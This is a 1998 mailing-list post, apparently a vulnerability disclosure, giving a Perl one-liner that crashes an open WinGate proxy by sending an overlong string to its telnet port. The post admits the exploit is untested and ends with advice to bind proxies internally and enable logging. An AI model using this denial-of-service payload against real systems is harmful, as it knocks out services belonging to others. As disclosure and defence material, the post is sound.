crashing wingates

From: G23 (g23at_private)
Date: Sat Nov 14 1998 - 10:51:30 PST

    Hello,

    The following one-liner will crash an open Wingate.

    perl -MIO::Socket -e \
    'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
    ->send("X" x 4400 . "\n",0)'

    Unfortunately I don't have access to one that I can test, so I am unable to verify what versions are vulnerable.  The above is my rendition of a 44 line sh script written by "rEWTED" (kefkaat_private).

    Anyone configuring a proxy for LAN use should only bind to an internal
    interface anyway.  (IE, kidz shouldn't even see your proxy)
    http://wingate.net/helppages/wingate2Securing_your_network.html

    If you do provide telnet proxy for the world, then at least log.
    http://wingate.net/helppages/wingate2Auditing_and_Logging.html

    ghost23